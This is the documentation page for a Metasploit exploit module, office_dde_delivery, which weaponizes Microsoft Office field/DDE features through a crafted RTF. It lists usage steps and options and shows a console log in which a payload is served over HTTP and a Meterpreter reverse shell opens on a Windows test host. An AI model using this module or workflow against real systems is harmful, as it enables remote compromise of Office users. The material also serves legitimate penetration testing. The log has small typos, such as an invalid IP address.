adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
052d233bd973e6a7e8b39da038962ceffa4cc6de
metasploit-gs/documentation/modules/exploit/windows/fileformat/office_dde_delivery.md
T
thecarterb bde2884e11 Fixes from review
2018-02-03 11:23:58 -05:00

1.3 KiB
Raw Blame History

Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.

Vulnerable Application

All Microsoft Office versions

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/windows/fileformat/office_dde_delivery
  3. Do: set PAYLOAD [PAYLOAD]
  4. Do: run

Options

FILENAME

Filename to output, whether injecting or generating a blank one

INJECT_PATH

Path to filename to inject

Example

msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/DGADAcDZ
[*] Local IP: http://192.1668.0.11:8080/DGADAcDZ
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink